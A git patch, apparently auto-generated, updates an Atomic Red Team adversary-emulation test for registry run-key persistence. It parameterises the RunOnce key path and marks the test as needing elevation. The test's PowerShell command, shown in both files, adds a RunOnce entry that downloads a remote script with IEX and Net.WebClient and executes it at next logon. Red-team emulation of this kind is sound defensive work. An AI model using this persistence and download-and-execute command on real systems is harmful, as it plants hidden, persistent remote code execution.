From 877da0ba7d174ae292cbc2b57cefdbe928ac96dd Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 2 Mar 2020 20:31:47 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1060/T1060.md |  7 ++++---
 atomics/index.yaml     | 11 ++++++++---
 2 files changed, 12 insertions(+), 6 deletions(-)

diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index a987a698..2bd52117 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -114,17 +114,18 @@ RunOnce Key Persistence via PowerShell
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | powershell.exe|
+| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce|
 
 
-#### Attack Commands: Run with `powershell`! 
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
 ```
-$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+$RunOnceKey = "#{reg_key_path}"
 set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
 ```
 
 #### Cleanup Commands:
 ```
-Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
+Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
 ```
 
 
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 45048ccd..175a21dc 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -3785,13 +3785,18 @@ persistence:
           description: Thing to Run
           type: Path
           default: powershell.exe
+        reg_key_path:
+          description: Path to registry key to update
+          type: Path
+          default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
       executor:
         name: powershell
+        elevation_required: true
         command: |
-          $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+          $RunOnceKey = "#{reg_key_path}"
           set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
-        cleanup_command: 'Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
-          -ErrorAction Ignore
+        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
+          -Force -ErrorAction Ignore
 
 '
   T1053: